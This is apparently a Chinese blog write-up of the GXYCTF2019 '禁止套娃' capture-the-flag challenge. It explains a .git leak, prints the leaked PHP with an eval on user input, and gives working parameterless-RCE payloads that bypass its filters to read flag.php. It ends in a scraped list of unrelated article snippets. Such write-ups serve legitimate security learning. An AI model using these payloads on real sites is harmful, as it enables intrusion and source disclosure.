[GXYCTF2019]禁止套娃1 [GitHack] [无参数RCE]
Git基础
Git信息泄露原理解析及利用总结 - FreeBuf网络安全行业门户
CTF中的GIT泄露_ctf git泄露-CSDN博客
Git结构
dirsearch扫出来一大堆东西(然而这些并没有什么屁用)
但也算起码了解了git结构了吧
/.git/HEAD:表示当前HEAD指针的指向
ref: refs/heads/master/.git/logs/HEAD:表示HEAD的变更历史
0000000000000000000000000000000000000000 一开始的e729e0b15f06da388b0e634afffd19b8e17b572a 当前的Your Name <you@example.com> 1577283742 +0800 commit (initial): init 提交的init不是文件而是类似于备注之类的东西,在下文/.git/COMMIT_EDITMSG也出现了(换行后)
/.git/info/exclude:
# git ls-files --others --exclude-from=.git/info/exclude
# Lines that start with '#' are comments.
# For a project mostly in C, the following would be a good set of
# exclude patterns (uncomment them if you want to use them):
# *.[oa]
# *~
/.git/COMMIT_EDITMSG:用来临时存储提交消息(Commit Message)的文件
init
# Please enter the commit message for your changes. Lines starting
# with '#' will be ignored, and an empty message aborts the commit.
#
# On branch master
#
# Initial commit
#
# Changes to be committed:
# new file: index.php
#
# Untracked files:
# flag.php
#
/.git/config:存储针对当前仓库的特定配置信息
[core]repositoryformatversion = 0filemode = truebare = falselogallrefupdates = true
/.git/description:
Unnamed repository; edit this file 'description' to name the repository.
/.git/index:
DIRC ^p?茭
^p?茭? 2I? 仱 ? ? 渜iB+餲kSi襑v?a醁B寪 index.php TREE 1 0
朄q G妮ㄏ^?渥樊畹N?G?隂?xD邝?倷/.git/logs/refs/heads/master:
0000000000000000000000000000000000000000 e729e0b15f06da388b0e634afffd19b8e17b572a Your Name <you@example.com> 1577283742 +0800 commit (initial): init
/.git/refs/heads/master:git仓库的默认分支
e729e0b15f06da388b0e634afffd19b8e17b572a用kali上的GitHack但是没有成功
用kali扫了半天都是空仓库,不知道为什么,在windows上下了一个立马就好了
得到index.php
<?php
include "flag.php";
echo "flag在哪里呢?<br>";
if(isset($_GET['exp'])){if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {// echo $_GET['exp'];@eval($_GET['exp']);}else{die("还差一点哦!");}}else{die("再好好想想!");}}else{die("还想读flag,臭弟弟!");}
}
// highlight_file(__FILE__);
?>无参数RCE
特征过滤:
if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp']))
就是只让你传函数,但是函数里面不能有参数
绕过方法
无参数RCE绕过的详细总结(六种方法)_无参数的取反rce-CSDN博客
方法一 使用localeconv()+scandir()等函数嵌套
注意这里末尾一定要有 ;
/?exp=highlight_file(next(array_reverse(scandir(current(localeconv())))));
localeconv() 返回一个数组,包含本地化(locale)的货币和数值格式信息,第一个值就是 .
. 表示当前目录
current() 返回数组内部指针当前指向的元素值(默认指向第一个元素)
scandir() 返回当前文件中所有目录列表(返回一个数组)
数组移动操作:
1.next() 将内部指针指向数组中下一个元素并输出
2.end() 将内部指针指向最后一个元素并输出
3.prev() 指向前一个元素并输出
4.reset() 指向第一个元素并输出
5.each() 返回当前元素的键名和键值,并让指针向前移动
错误payload1:
/?exp=var_dump(scandir(localeconv()))
为什么不对?因为这里localeconv()返回的是一个数组,scandir()接收到数组的时候会尝试将参数转换为Array,而Array目录不存在,所以会失败
错误payload2:
/?exp=highligth_file(next(next(next(scandir(current(localeconv()))))));
highlight_file(): 显示flag.phpd的件内容
var_dump():用于显示文件名
错误payload3:
/?exp=highlight_file(prev(end(scandir(current(localeconv())))));
为什么不对!!我觉得很对!!
方法二 使用session_id
/?exp=highlight_file(session_id(session_start()));这里readfile也可以,区别在于readfile是直接读取文件内容(不带<?php),而highlight_file()是显示源码,带着<?phpsession_id()如果传入参数时候会设置当前会话id(设置的值就是传入的参数),如果不传入参数的时候会返回当前会话的id
session_start() 启动会话成功以后会返回bool值true,这个值传入到session_id()中没有什么实际意义(不是id),所以session_id()会当作没有参数传入并返回当前会话的id,我们可以通过操纵当前会话id来实现highlight_file文件读取
为什么有时候能发出去有时候发不出去??
后来才尝试出来发的时候消息包末尾要有两行换行!!
readfile()
highlight_file()
相关文章:
[GXYCTF2019]禁止套娃1 [GitHack] [无参数RCE]
Git基础 Git信息泄露原理解析及利用总结 - FreeBuf网络安全行业门户 CTF中的GIT泄露_ctf git泄露-CSDN博客 Git结构 dirsearch扫出来一大堆东西(然而这些并没有什么屁用) 但也算起码了解了git结构了吧 /.git/HEAD:表示当前HEAD指针的指…...
从ChatGPT到AutoGPT——AI Agent的范式迁移
一、AI Agent的范式迁移 1. ChatGPT的局限性与Agent化需求 单轮对话的“工具属性” vs. 多轮复杂任务的“自主性” ChatGPT 作为强大的生成式AI,虽然能够进行连贯对话,但本质上仍然是“工具型”AI,依赖用户提供明确的指令,而无法自主规划和执行任务。 人类介入成本过高:提…...
stock-pandas,一个易用的talib的替代开源库。
原创内容第841篇,专注智能量化投资、个人成长与财富自由。 介绍一个ta-lib的平替——我们来实现一下,最高价突破布林带上轨,和最低价突破布林带下轨的可视化效果: cross_up_upper stock[high].copy()# cross_up_upper 最高价突破…...
Spring Cloud Gateway详细介绍简单案例
文章目录 1、Spring Cloud Gateway 详细介绍1.1. 统一入口(Single Entry Point)1.2. 请求路由(Request Routing)1.3. 负载均衡(Load Balancing)1.4. 流量控制(Rate Limiting)1.5. 身…...
鸿蒙原生开发之状态管理V2
一、ArkTS状态变量的定义: State:状态,指驱动UI更新的数据。用户通过触发组件的事件方法,改变状态数据。状态数据的改变,引起UI的重新渲染。 在鸿蒙原生开发中,使用ArkTS开发UI的时候,我们可以…...
矩阵中对角线的遍历问题【C++】
1,按对角线进行矩阵排序 题目链接:3446. 按对角线进行矩阵排序 - 力扣(LeetCode) 【题目描述】 对于一个m*n的矩阵grid,要求对该矩阵进行 变换,使得变换后的矩阵满足: 主对角线右上的所有对角…...
)
Python小练习系列 Vol.4:迷宫寻路(回溯 + DFS)
🧠 Python小练习系列 Vol.4:迷宫寻路(回溯 DFS) 🚪 本期我们将探索一个二维世界,借助回溯算法帮助角色走出迷宫!这是学习路径搜索类题目的经典案例。 🧩 一、题目描述 给定一个二维…...
[Lc4_dfs] 解数独 | 单词搜索
目录 1.解数独 题解 2.单词搜索 题解 1.解数独 链接:37. 解数独 编写一个程序,通过填充空格来解决数独问题。 数独的解法需 遵循如下规则: 数字 1-9 在每一行只能出现一次。数字 1-9 在每一列只能出现一次。数字 1-9 在每一个以粗实线…...
day17 学习笔记
文章目录 前言一、数组的增删改查1.resize函数2.append函数3.insert函数4.delete函数5.argwhere函数6.unique函数 二、统计函数1.amax,amin函数2.ptp函数3.median函数4.mean函数5.average函数6.var,std函数 前言 通过今天的学习,我掌握了num…...
自动语音识别(ASR)技术详解
语音识别(Automatic Speech Recognition, ASR)是人工智能和自然语言处理领域的重要技术,旨在将人类的语音信号转换为对应的文本。近年来,深度学习的突破推动语音识别系统从实验室走入日常生活,为智能助手、实时翻译、医…...
git | 版本切换的相关指令
常见指令 git log --oneline #查看历史提交 git tag latest-backup # 对当前的提交进行标记,标记名为latest-backup git checkout -b old-version 55b16aa # 切换到[55b16aa]的提交中,并标记为[old-version]的分支 git checkout master …...
19.OpenCV图像二值化
OpenCV图像二值化 图像二值化(Binarization)是图像预处理中的一种常用技术,其目的是将图像中的像素值分为两个类别——通常是“前景”和“背景”或者说0和255。二值化能够简化图像信息,为后续的形态学处理、边缘检测、目标识别等…...
通过Appium理解MCP架构
MCP即Model Context Protocol(模型上下文协议),是由Anthropic公司于2024年11月26日推出的开放标准框架,旨在为大型语言模型与外部数据源、工具及系统建立标准化交互协议,以打破AI与数据之间的连接壁垒。 MCP架构与Appi…...
分享一个Pyside6实现web数据展示界面的效果图
今天又是有问题直接找DS的一天,每日一问,今天我的问题是“怎么将pyside6生成的界面转成web界面,使用python语言实现web界面”,等了一会,DS给我提供了两种方案,方案如下: 然后,让我们…...
FALL靶场通关攻略
1,下载好靶机后打开,通过kali扫描靶机ip和端口,得到靶机ip为192.168.50.144 2,扫描目录 3,访问靶机 4,访问扫描到的test.php,得到缺少GET请求参数的提示 5,使用FUZZ来扫出参数为file 6ÿ…...
Mybatis日志模块分析--适配器模式+代理模式
适配器模式 日志在我们开发过程中占据了一个非常重要的地位,是开发和运维管理之间的桥梁,在Java中的日志框架也非常多,Log4j,Log4j2,Apache Commons Log,java.util.logging,slf4j等,这些工具对外的接口也都不尽相同,为…...
应用介绍)
HTTP介绍以及(GET/POST/PUT/DELETE)应用介绍
WWW 是 “World Wide Web” 的缩写,中文名为 “万维网”。它是一个基于超文本和 HTTP 协议的全球性信息系统,通过互联网连接了世界各地的服务器和用户。用户可以使用浏览器访问各种网站,浏览网页、获取信息、进行交互等。 WWW 的核心技术包…...
圆球法线图,图生法线图 图片生成法线图
目录 圆球法线图 根据图片生成法线图 深度图计算法线图 圆球法线图 import numpy as np import matplotlib.pyplot as plt from mpl_toolkits.mplot3d import Axes3D# 定义球体的参数 radius 1.0 resolution 100# 生成球体表面的点 u np.linspace(0, 2 * np.pi, resoluti…...
notepad++ 正则表达式
注意:Notepad正则表达式字符串最长不能超过69个字符 \ 转义字符 如:要使用 “\” 本身, 则应该使用“\\” \t Tab制表符 注:扩展和正则表达式都支持 \r 回车符CR 注:扩展支持,正则表达式不支持 \n 换行符…...
Java基于SpringBoot的网络云端日记本系统,附源码+文档说明
博主介绍:✌Java老徐、7年大厂程序员经历。全网粉丝12w、csdn博客专家、掘金/华为云/阿里云/InfoQ等平台优质作者、专注于Java技术领域和毕业项目实战✌ 🍅文末获取源码联系🍅 👇🏻 精彩专栏推荐订阅👇&…...
【自用记录】本地关联GitHub以及遇到的问题
最近终于又想起GitHub,想上传代码和项目到仓库里。 由于很早之前有在本地连接过GitHub(但没怎么用),现在需要重新搞起(操作忘得差不多)。 在看教程实操的过程中遇到了一些小问题,遂记录一下。 前…...
页码设置相关问题记录
Q:中间没有显示页码怎么办? A:“页眉和页脚”-“页码”-“页面底端”-“普通数字2” Q:想让页码在某几节连续怎么办? A: ① 先保证节与节之间插入了“分节符”(如何插入分节符和如何显示分节符…...
什么是数据集市
数据集市(Data Mart)是数据管理领域的核心概念,其定义为面向特定业务领域或用户群体的小型数据仓库子集,专注于部门级业务分析,具有快速响应、灵活部署等特点。以下从定义、特点、类型、结构、应用场景及与其他数据架构…...
Python 的未来:在多元变革中持续领跑
一、从工具到生态:Python 的核心优势筑牢发展根基 Python 自诞生以来,始终以 “简洁易用” 和 “跨界融合” 为标签,在技术快速迭代的时代展现出惊人的韧性。其核心竞争力不仅在于语法的直观性 —— 让开发者专注于逻辑实现而非语法细节&…...
【HC-05蓝牙模块】主要性能指标与通信基础知识
一、HC-05 基础学习视频 HC-05蓝牙串口通信模块调试与应用1 二、HC-05学习视频课件...
深度学习中的数据类型
1. NumPy 数组 (numpy.ndarray) 核心定位:科学计算的基础工具,处理数值多维数组。 特点: 高效数值运算:底层用 C 实现,适合数学计算(如矩阵乘法、傅里叶变换)。 内存连续存储:数据…...
如何缩短研发周期,降低研发成本?全星APQP软件为您提供解决方案
如何缩短研发周期,降低研发成本?全星APQP软件为您提供解决方案 一、 系统概述 全星研发管理APQP软件系统是一款专为产品研发和质量管控打造的智能化平台,旨在帮助企业高效推进APQP(先期产品质量策划)流程,…...
嵌入式系统安全架构白皮书
嵌入式系统安全架构白皮书 一、安全威胁模型 1.1 典型攻击面分析 #mermaid-svg-mxWZ8IOtOmMv6YLV {font-family:"trebuchet ms",verdana,arial,sans-serif;font-size:16px;fill:#333;}#mermaid-svg-mxWZ8IOtOmMv6YLV .error-icon{fill:#552222;}#mermaid-svg-mxWZ8I…...
)
MQTT之重复消息(5、TCP重连和MQTT重连)
目录 1. TCP 协议层的重传(原生机制) 2. 触发 TCP 重传的具体场景 3、TCP 重传的关键参数(了解) 第一、重传超时(RTO - Retransmission Timeout) 第二、重传次数 第三、累计时间 vs 本次 RTO 的区别 第四.常见问题解答 第…...
Github Webhook 以及主动式
Github配置 GitHub 默认支持两种 Content-Type: application/json application/x-www-form-urlencoded 特别要注意 Content-Type 我们选择: application/json Flask代码 import os import shutil import subprocess from flask import Flask, request, jsonifyapp = Fla…...